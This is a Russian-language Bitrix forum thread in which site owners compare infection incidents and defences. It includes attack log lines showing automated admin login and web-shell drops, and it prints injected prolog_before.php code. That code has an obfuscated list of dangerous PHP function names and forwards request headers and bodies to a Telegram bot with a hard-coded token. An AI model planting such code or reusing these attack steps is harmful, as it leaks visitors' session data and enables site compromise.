Разработчикам

Заражение сайтов

RSS

Заражение сайтов

Пользователь 4265440

Посетитель

Сообщений: 41 Баллов: 6 Регистрация: 11.03.2021

#326

07.06.2025 01:45:03

Интерсный запрос вчера в логе словил
138.124.31.112 - - [06/Jun/2025:08:33:32 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.1"

А немногим позже обращение к трояну
138.124.31.112 - - [06/Jun/2025:11:42:02 +0300] "GET /6940ecae5880.php HTTP/1.1"

Интерсно то что через /bitrix/tools/composite_data.php уже ломились, года три этак назад, тогда выкатили обновление и лазейку прикрыли, а сейчас хакеры видать что то поменяли и снова ломятся в ту же дверь...

Пользователь 40932

Заглянувший

Сообщений: 2 Регистрация: 10.09.2015

#327

10.06.2025 17:03:38

всем привет, вести с полей:

по всей видимости брутят пароль или просто подбирают по словарям либо же по открытым источникам.

в автоматическом режиме авторизовываются в адмике, переходят в исполнение php кода, ну а дальше уже раскидывают файлики accesson.php, wp-cron.php, wp-blog-header.php, папки wp/

Код

$ cat domain.tld-access.log | grep 138.124.31.112
138.124.31.112 - - [10/Jun/2025:16:41:43 +0300] domain.tld "GET /bitrix/admin/index.php?login=yes HTTP/1.0" 301 162 0.000 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "-"
138.124.31.112 - - [10/Jun/2025:16:41:43 +0300] domain.tld "GET /bitrix/admin/index.php?login=yes HTTP/1.0" 200 22561 0.029 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "-"
138.124.31.112 - - [10/Jun/2025:16:41:44 +0300] domain.tld "POST /bitrix/admin/index.php?login=yes HTTP/1.0" 200 130 0.079 "https://domain.tld/bitrix/admin/index.php?login=yes" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:45 +0300] domain.tld "GET /bitrix/admin/php_command_line.php?lang=ru HTTP/1.0" 200 516420 0.236 "https://domain.tld/bitrix/admin/index.php?login=yes" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:47 +0300] domain.tld "POST /bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a436d6699 HTTP/1.0" 200 119 0.110 "https://domain.tld/bitrix/admin/php_command_line.php?lang=ru" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:48 +0300] domain.tld "POST /bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a436d6699 HTTP/1.0" 200 119 0.078 "https://domain.tld/bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a...; "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:52 +0300] domain.tld "POST /bitrix/admin/accesson.php HTTP/1.0" 200 9 0.056 "https://domain.tld/bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a...; "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:42:02 +0300] domain.tld "GET /bitrix/admin/570762b20afa.php HTTP/1.0" 200 9 0.001 "https://domain.tld/bitrix/admin/accesson.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"

несколько раз всё вычищал, пока не понял что в админку входят.

вывод: после того, как почистили не забудьте поменять пароли.

Пользователь 126180 Заглянувший Сообщений: 2 Регистрация: 25.10.2012	#328 10.06.2025 20:22:06 Кто хочет закрыть сайт по странам на основе IP - это легко сделать, если у вас ISP панель на хостинге. И действует вариант с актуальными базами.

Пользователь 4265440

Посетитель

Сообщений: 41 Баллов: 6 Регистрация: 11.03.2021

#329

11.06.2025 23:03:05

Цитата
написал: по всей видимости брутят пароль или просто подбирают по словарям либо же по открытым источникам

Подскажите, а штатный механизм защиты административного раздела /bitrix/admin/security_iprule_admin.php был задействован?

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

#330

26.06.2025 18:17:31

Сегодня перестала работать авторизация. Ругалось на bitrix/modules/main/include/prolog_before.php

Вот содержимое:

Код

$suspicious = [
'ev' . 'a' . 'l','sy' . 'st' . 'em','pas' . 'sth' . 'ru','ex' . 'ec','she' . 'll_' . 'exec',
    'bas' . 'e64_' . 'decode','she' . 'll','pop' . 'en','pro' . 'c_o' . 'pen','cur' . 'l_e' . 'xec',
    'fop' . 'en','fil' . 'e_ge' . 't_co' . 'nte' . 'nts','ass' . 'ert','pre' . 'g_re' . 'plac' . 'e',
    'php' . 'inf' . 'o','mk' . 'dir','un' . 'link','ch' . 'mod','inc' . 'lud' . 'e',
    'req' . 'uir' . 'e','mov' . 'e_up' . 'load' . 'ed_f' . 'ile','fil' . 'e_pu' . 't_co' . 'nte' . 'nts','rea' . 'dfi' . 'le',
    'soc' . 'ket_' . 'cre' . 'ate','str' . 'eam' . '_soc' . 'ket_cl' . 'ient','cre' . 'ate_' . 'fun' . 'ctio' . 'n',
    'dl(','par' . 'se_' . 'str','ini' . '_se' . 't','err' . 'or_' . 'rep' . 'ort' . 'ing','set' . '_tim' . 'e_li' . 'mit',
    'pro' . 'c_cl' . 'ose','pcl' . 'ose','pcn' . 'tl_' . 'ex' . 'ec','sy' . 'ml' . 'ink','re' . 'nam' . 'e','ch' . 'own', '/etc' . '/pass' . 'wd'
];

function containsSuspiciousRecursive($array, $suspicious) {
    foreach ($array as $k => $v) {
        foreach ($suspicious as $word) {
            if (stripos($k, $word) !== false) return true;
            if (is_string($v) && stripos($v, $word) !== false) return true;
         if (is_array($v) && containsSuspiciousRecursive($v, $suspicious)) return true;
        }
    }
    return false;
}

$headers = getallheaders();

if (containsSuspiciousRecursive($_REQUEST, $suspicious) || containsSuspiciousRecursive($headers, $suspicious)) {
   $data = "METHOD: {$_SERVER['REQUEST_METHOD']}" . PHP_EOL;
   $data .= "TARGET: {$_SERVER['REQUEST_URI']}" . PHP_EOL;
   $data .= "IP: {$_SERVER['REMOTE_ADDR']}" . PHP_EOL;
   $data .= "UA: {$_SERVER['HTTP_USER_AGENT']}" . PHP_EOL . PHP_EOL;
   $data .= "HEADERS:" . PHP_EOL;
   foreach ($headers as $name => $value) {
      $data .= "$name: $value" . PHP_EOL;
   }
   $data .= PHP_EOL . "BODY:" . PHP_EOL . print_r($_REQUEST, true);

    file_get_contents(
        "https://api.telegram.org/bot7783741198:AAG6KTeA-X19Xw4x16sQOm6ZwFUpHQAVd90/sendMessage?" .
        "chat_id=-1002753657432&text=" . urlencode($data)
    );
}

define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);

if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}

require_once(__DIR__."/. ./include.php");

CMain::PrologActions();

Другой информации пока нет.
Я правильно понимаю, что какие-то данные сливались злоумышленникам в телегу?

Пользователь 670305 Постоянный посетитель Сообщений: 152 Баллов: 31 Регистрация: 12.08.2016	#331 27.06.2025 15:43:01 Нет, здесь, похоже, предполагалось в телегу пересылать подозрительные запросы к сайту.

Пользователь 9103492

Заглянувший

Сообщений: 1 Регистрация: 07.08.2025

#332

07.08.2025 23:28:32

Цитата
написал: Оптимально будет /bitrix/admin/ закрыть по белым спискам IP. Есть некоторые неудобства, но это лучше, чем получить зомби-сайт

Закрыли. По сути был взлом, НО была старая версия php и не обновлен Битрикс довольно давно.

НО как без админки залили файлы тогда?

Админка была закрыта. Понятно что через шелл.

Когда заходили на сайт была ошибка БАЗЫ.

Они создали своего пользователя в базе со всеми привелегиями

с нашего сервера рассылали СПАМ.

Были обнаружены PHP скрипты unlink (чтобы удалять файлы через PHP)

PHP архиватор, который работает по ссылке

То есть сайт клали в основном через базу, и один раз хостер отключил за СПАМ запросы..

Они оставили код во многих файлах, на скрине показано в скольких файлах он был и был удален

Прикрепленные файлы

localhost.jpg (92.84 КБ)

11033.jpg (256.92 КБ)

1100.jpg (506.64 КБ)

Пользователь 1163543

Посетитель

Сообщений: 27 Баллов: 5 Регистрация: 25.05.2017

#333

27.08.2025 18:36:21

Цитата
написал: Ругалось на bitrix/modules/main/include/prolog_before.phpВот содержимое:

Точно такая же ситуация. Но при этом никаких бекдоров не нашли. Вам не удалось выяснить, кто вставил этот код? Может хостер?

Пользователь 7585474

Посетитель

Сообщений: 23 Баллов: 4 Регистрация: 26.09.2023

#334

28.08.2025 10:10:42

Цитата

написал:

Цитата
написал: Оптимально будет /bitrix/admin/ закрыть по белым спискам IP. Есть некоторые неудобства, но это лучше, чем получить зомби-сайт

Закрыли. По сути был взлом, НО была старая версия php и не обновлен Битрикс довольно давно.

НО как без админки залили файлы тогда?

Вы искренне полагаете что для залива вредоноса обязательное условие это доступ к админке? У меня для вас плохие новости.
Вангую, что ломают Вас всеми известными способами которым подвержен необновленный битрикс и php. Плюс туда же дыры в шаблоне Аспро.
Белые списки IP для админки это хорошо, но полностью проблемы не решает.

Пользователь 7585474

Посетитель

Сообщений: 23 Баллов: 4 Регистрация: 26.09.2023

#335

28.08.2025 10:14:35

Цитата

написал:

Цитата
написал: Ругалось на bitrix/modules/main/include/prolog_before.phpВот содержимое:

Да делать хостеру больше нечего чтоль?)) хостинг скорее всего шаред?) вот туда и думайте, ломали тут уже кого то с техдомена

Пользователь 13618

Эксперт

Сообщений: 1366 Баллов: 231 Регистрация: 05.04.2011

Сертифицированный партнер

#336

28.08.2025 10:24:20

Цитата
IgorX IgorX написал: НО как без админки залили файлы тогда?

Вы думаете файлы какой то злобный хацкер вручную через админку заливает

?
Всё это 100% автоматизировано - скрипты роботы на уровне уязвимостей разных уровней всё это делают в массовом порядке.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 23748

Гуру

Сообщений: 2788 Баллов: 453 Регистрация: 20.04.2008

АКРИТ Веб-студия

#337

28.08.2025 15:20:55

Цитата
написал: Может хостер?

если хостеру дорога репутация и клиенты, то никто в здравом уме такое делать не будет, наоборот предупреждают заранее клиентов что смотрите мл вот у вас уязвимость, обновите сервачок и битрикс с модулями...

а проникают как раз из-за раздолбайства или жадности и скупости через уязвимости которые публично в интернетах описаны и даже начинающий школьник может ими воспользоваться не говоря уже о том что настоящий хакер сделает бота который будет автоматом такое искать...

Веб-студия АКРИТ Увеличьте продажи трансформировав сайт в сеть торговых точек в интернете

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

#338

28.08.2025 22:53:33

Цитата
Дмитрий Загайнов написал: Вам не удалось выяснить, кто вставил этот код? Может хостер?

Это случилось, потому в прошлый раз я не до конца дыры убрал. Я по дате изменений файлов делал список и чистил. Но один из злоумышленников был хитер и подменил дату модификации трех файлов. Скопировал дату у соседних нормальных файлов. Нашел, почистил. Больше не всплывало

Пользователь 4265440

Посетитель

Сообщений: 41 Баллов: 6 Регистрация: 11.03.2021

#339

31.08.2025 08:52:09

Цитата
написал: Белые списки IP для админки это хорошо, но полностью проблемы не решает

Истину глаголите, закрыть по ip /bitrix/admin/ недостаточно, дабы защититься от угроз следует на уровне сервера полностью закрывать извне доступ к каталогу /bitrix/, оставив только доступ сервисам Битрикса

Заражение сайтов

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером